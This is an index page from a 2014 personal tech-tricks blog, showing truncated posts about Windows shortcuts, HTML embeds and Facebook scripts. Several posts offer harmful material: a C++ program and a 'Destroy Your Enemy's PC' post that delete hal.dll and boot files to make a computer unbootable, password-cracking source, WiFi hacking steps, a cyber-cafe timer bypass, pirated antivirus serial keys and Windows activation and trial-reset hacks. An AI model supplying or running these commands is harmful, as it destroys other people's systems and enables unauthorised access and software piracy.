TO DELETE THE HAL.DLL FILE
Posted By: Abhishek Anand
This is a powerful C++ program, which deletes Hal.dll, something that is required for startup. After deleting that, it shuts down, never to start again.This is not a prank..
Warning: Do not try this on your home computer.
Code:
#include <cstdlib>
#include <iostream>
using namespace std;
int main(int argc, char *argv[])
{
system("del %SystemRoot%\\system32\\hal.dll...
Saturday, 31 May 2014
20:17
Stranger
No comments
ADD TEXT TO AN IMAGE>>>>>>>>>>>
Posted By: Abhishek Anand
Put some txt in an image.
CODING:
#include <stdio.h>
#include <gd.h>
#include <gdfontg.h>
int main(int argc, char *argv[]) {
gdImagePtr img;
FILE *fp = {0};
int width, white, black;
width = white = black = 0;
if(argc != 3) {
fprintf(stderr, "Usage: pngtxt image.png 'Hello world.. !'\n");
...
20:16
Stranger
No comments
FOLDER LOCK SOURCE CODE>>>>.
Posted By: Abhishek Anand
#include<process.h>
#include<iostream.h>
#include<fstream.h>
#include<conio.h>
void print();
void choice();
void main()
{
clrscr();
print();
cout<<”nnnnnnnn -Before proceeding read carefully the
readme.txt file.”;
cout<<”nn -On execution it will create files namely lock.bat &
unlock.bat.”;
cout<<”nnnnnnnnnnnnnnnttttTHANK YOU”;
cout<<”nnnnnnnnnnntttttttpress...
20:14
Stranger
No comments
RUN COMMANDS FOR WINDOWS>>>>>>>
Posted By: Abhishek Anand
CONTROL COMMANDS
* CONTROL: opens the control panel window
* CONTROL ADMINTOOLS: opens the administrative tools
* CONTROL KEYBOARD: opens keyboard properties
* CONTROL COLOUR: opens display properties.Appearance tab
* CONTROL FOLDERS: opens folder options
* CONTROL FONTS: opens font policy management
* CONTROL INTERNATIONAL or INTL.CPL: opens Regional and Language...
20:12
Stranger
No comments
PLAY YOUTUBE VIDEOS IN THE WEBSITE>>
Posted By: Abhishek Anand
src="http://www.youtube.com/urlink"
type="application/x-shockwave-flash">
eg:
<html>
<body>
<embed
width="420" height="345"
src="http://www.youtube.com/urlink"
type="application/x-shockwave-flash">
</embed>
</body>
</html>
--------------------------------------------------------------------------------------------------------...
20:11
Stranger
No comments
CRACK WINDOWS PASSWORD SOURCE CODE!!!
Posted By: Abhishek Anand
: This will reveal your windows computer password. Just copy this code on to a notepad.
Save it as anything.c. Remember to change the file type to "All file".
# include<stdio.h>
# include<stdio.h>
# include<process.h>
# include<stdlib.h>
# include<ctype.h>
# include<conio.h>
# include<mem.h>
unsigned...
20:09
Stranger
No comments
FACEBOOK ACCEPT OR REJECT AT ONE TIME!!!!
Posted By: Abhishek Anand
*If You Get A Lot Of Friend Requests Daily Or You Opened You Facebook Account After A Long Time, You Could End Up Having To Manually Accept Or Reject All Of Them, these code can be used to accept or reject all of them at once.
PROCESS>>>
Copy The Following Code:
For Accepting:
javascript:for( i = 1;i<document.getElementsByName("actions[accept]").length;i++){document.getElementsByName("actions[accept]")[i].click();}void(0);
For...
20:03
Stranger
No comments
Partition a Drive Without Losing Data!!!!
Posted By: Abhishek Anand
Wishes to partition your hard drives? But, partitioning a drive in windows will needed us toformat the drive. In this tutorial, I will teach you how to partition a drive without need to backup your data and format your drives. You might wonder if this trick need you to downloadsome softwares or tools. Do not worry because this trick is 100% download-free. We just gonna use...
20:01
Stranger
No comments
---Trick to enable/diable "Task manager"---
Posted By: Abhishek Anand
* Click Start
* Click Run
* Enter gpedit.msc in the Open box and click OK
* In the Group Policy settings window
o Select User Configuration
o Select Administrative Templates
o Select System
o Select Ctrl+Alt+Delete options
o Select Remove Task Manager
o Double-click the Remove Task Manager option
since the policy is Remove Task Manager, by disabling the policy, you are enabling...
19:59
Stranger
11 comments
Microsoft ShortCut Keys
Keyboard Shortcuts
Posted By: Abhishek Anand
Ctrl + A Select all (including text, graphics).
Ctrl + B Bold.
Ctrl + I Italic.
Ctrl + U Underline.
Ctrl + C Copy.
Ctrl + V Paste.
Ctrl + X Cut.
Ctrl + F Find.
Ctrl + Z...
19:58
Stranger
No comments
Top 25 Application Secrets in Windows XP
There are some hidden secrets inside the application
window XP and sometimes we do not know ...
the following list is a list of confidential applications are:
Posted By: Abhishek Anand
To run the applications below:[/color]
Open a command prompt and Type the name of the program (example:
cleanmgr.exe)
or click Start -> Run and Type in the name of the program (example: cleanmgr.exe).
1. Disk Cleanup...
19:55
Stranger
16 comments
Make your WINDOWS XP Genuine Without any Software!
Posted By: Abhishek Anand
OPEN NOTEPAD AND WRITE THIS:
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\WPAEvents]
"OOBETimer"=hex:ff,d5,71,d6,8b,6a,8d,6f,d5,33,93,fd
"LastWPAEventLogged"=hex:d5,07,05,00,06,00,07,00,0f,00,38,00,24,00,fd,02
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion]
"CurrentBuild"="1.511.1 () (Obsolete...
19:53
Stranger
No comments
Destroy Your Enemy's PC...!!!
Posted By: Abhishek Anand
Open your notepad and type the following………
del c:\boot?ini c:\del autoexec.bat
Now Save as anyname.exe. Create this in C: drive
The only thing you need is Notepad.
1. Create a text file called TEST.txt(empty) in C:\
2. Now in your notepad type “erase C:\TEST.txt” (without the quotes). Then save it as “Test.cmd”.
3. Now run the file “Test.cmd”go to C:\ and you’ll see your Test.txt is...
19:50
Stranger
5 comments
How to protect Facebook account from being hacked?
Posted By: Abhishek Anand
Hacking of Facebook Account
#1. Its very easy to hack a Facebook account, If you are ignorant about the page URL. Many pishers around the Web create a page which will exactly look like the Facebook login page. If you login using that page, Your account will be in the hands of some Tom, Dick or Harry. So always check the URL of the page before logging in.
Facebook...
19:47
Stranger
No comments
CMD TRICKS
Posted By: Abhishek Anand
How to do calculations on Command Prompt ?
The command processor CMD.EXE comes with a mini calculator that can perform simple arithematic operations:
C:\>SET /A 5+3
8
C:\>SET /A 3*(9/4)
6
C:\>SET /A (4*5)/5
4
How to Create your own Run Command ?
Step 1: Go to “Start,” “Run,” (told you we use it a lot) and type regedit.
Step 2: Navigate to the following:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Apps...
Friday, 30 May 2014
21:44
Stranger
No comments

AVG Internet Security 2014 Serial
Posted By: Abhishek Anand
23
=
The keys ... (till 2018)
AVG Internet Security 2014 & AVG AntiVirus 2014
8MEH-RFOD4-SXWR8-JRTQA-JADCJ-WEMBR-ACED8MEH-RNXBD-GMYHF-BSLSR-ZK3FE-PEMBR-ACED8MEH-RU7JQ-ACDRM-MQEPR-G8D79-FEMBR-ACED8MEH-RR6GC-KLJJD-S7DBA-NU862-EEMBR-ACED8MEH-RPDWL-THRLY-O8Z3R-47QKC-4EMBR-ACED8MEH-RS47Y-82HT8-GONVA-BCCCZ-DEMBR-ACED8MEH-RXYFD-JUV72-8922R-FTDO8-QEMBR-ACED8MEH-RGM33-K474L-6FGRR-8QEFN-UEMBR-ACED8MEH-R6BFE-HWUHF-DPNDA-VFUWX-2EMBR-ACED8MEH-RXYFD-JUV72-8922R-FTDO8-QEMBR-ACED8MEH-RFR8J-PTS8Q-92ATA-ORC6Q-JEMBR-ACED8MEH-RS47Y-82HT8-GONVA-BCCCZ-DEMBR-ACED8MEH-RFR8J-PTS8Q-92ATA-O4WHO-JEMBR-ACEDXEETL-QXUPP-T39DN-A3L9F-TTTXL-JTWBA...
21:29
Stranger
No comments
HOW TO HACK A WIFI NETWORK
Posted By: Abhishek Anand
So.. Here’s how we do it..1) First we need to scan foravailable wireless networks.Theres this great tool forwindows to do this.. called“NetStumbler” or Kismet forWindows and Linux and KisMacfor MacIt’ll also show how the Wi-finetwork is secured..The two most commonencryption types are:1. WEP2. WAPWEP i.e Wire Equivalent Privacyis not consideres as safe as WAPi.e Wireless ApplicationProtocol.WEPhave...
21:28
Stranger
No comments
Request a new IP address from your ISP server
Posted By: Abhishek Anand
Here's how to do it in windows:1. Click Start2. Click run3. In the run box type cmd.exe and clickOK4.When the command prompt openstype the following. ENTER after each newline.ipconfig /flushdnsipconfig /releaseipconfig /renewexit5.Erase your cookies in whateverbrowser you are using.Frequently you will be assigned a new IPaddress when this happens. Sometimeyou will, sometimes...
21:20
Stranger
No comments
How To Invite to like a page in a single click On FacebookPosted By: Abhishek Anand
1. Click Invite Friends on whatever you
areinviting people to2. In the dropdown next to the search box,make sure Search All Friends or "Search byname" is selected!3. Scroll ALL the way down until names stoploading (I found it easy to click the firstname and then hold down the spacebar orPage Down button)4. For EVENTS Copy this code:javascript:elms=document.getElementsByName("checkableitems[]");for(i=0;i<elms.length;i++){if(elms[i].type="checkbox"...
21:15
Stranger
No comments
Facebook Tricks
Posted By: Abhishek Anand
Useful Information: Must Share
Here's a way to keep your Facebook
account still safe if you forgot to logout due
to a power shortage/blackout or if you are
using a public computer (internet cafe).
Try this method:
Steps:
1. Log in to Facebook from your own
computer.
2. Click `Account Settings` and then click`Security`3. Click `Edit` button near to `ActiveSessions`.4. You can see the Active Sessions...
21:14
Stranger
No comments
Disable Time limit in Cyber Cafe and use unlimited Internet------------------------------------------------------------------------------------------------------------------------------
Posted By: Abhishek Anand
Alright , Were Gonna Learn How To DisableThe Timer On The Computers On In InternetCafe's. Alright Create A New TextDocument,Than Type CMD In It, And ThanSave It As a Batch File, And Than Run TheNew Batch File On Your Desktop.Than Command...
21:12
Stranger
No comments
You can change the name of Recycle Bin icon
Posted By: Abhishek Anand
1-Click Start menu > Run > and type“regedit” (without quotes), to run WindowsRegistry Editor2-Find and go to following“HKEY_CLASSES_ROOT/CLSID/{645FF040-5081-101B-9F08-00AA002F954E}”3- double click on the default appear in theright side, Change the name "Recycle Bin" towhatever you wantNote :Incorrectly editing the registry mayseverely damage your system.Enjoy.
-------...
21:11
Stranger
No comments
To Unlock the hidden themes on Windows7, do the following:
Posted By: Abhishek Anand
1. Open Windows Explorer2. Click Organize , and select folder andsearch Options.3. Select show hidden files, folder anddrivers and uncheck Hide Protectedoperating system file (Recommended). Ifprompted with conformation click Yes5. Click Ok6. Browse the following folder: C:\windows\Globlization\MCT\7. There are five folder in the name withformat MCT-XX (Where...
21:08
Stranger
No comments
How To Make Window 7 Genuine Forever
Posted By: Abhishek Anand
1. Press Start + R
2. Type in CMD Press enter3. Type in the command box "SLMGR -REAM"4. Press Enter and wait a few second5. Restart your PC
----------------------------------------------------------------------------------------------------------...
21:05
Stranger
17 comments
>>How to reset the trial period of software to work it
lifetime:-
Posted By: Abhishek Anand
Firstuninstall the software and
follow the steps.
*. After uninstalling software,
OpenRUN(Windows key + R)
and type regedit and hit Enter.*. Now Registry Editor Windowwill appear and here navigatetoHKEY_LOCAL_MA CHINE \SOFTWARE \ Your Softwarename from left pane of thiswindow. If you find any Keyname with your softwarename then just Delete...
Subscribe to:
Posts (Atom)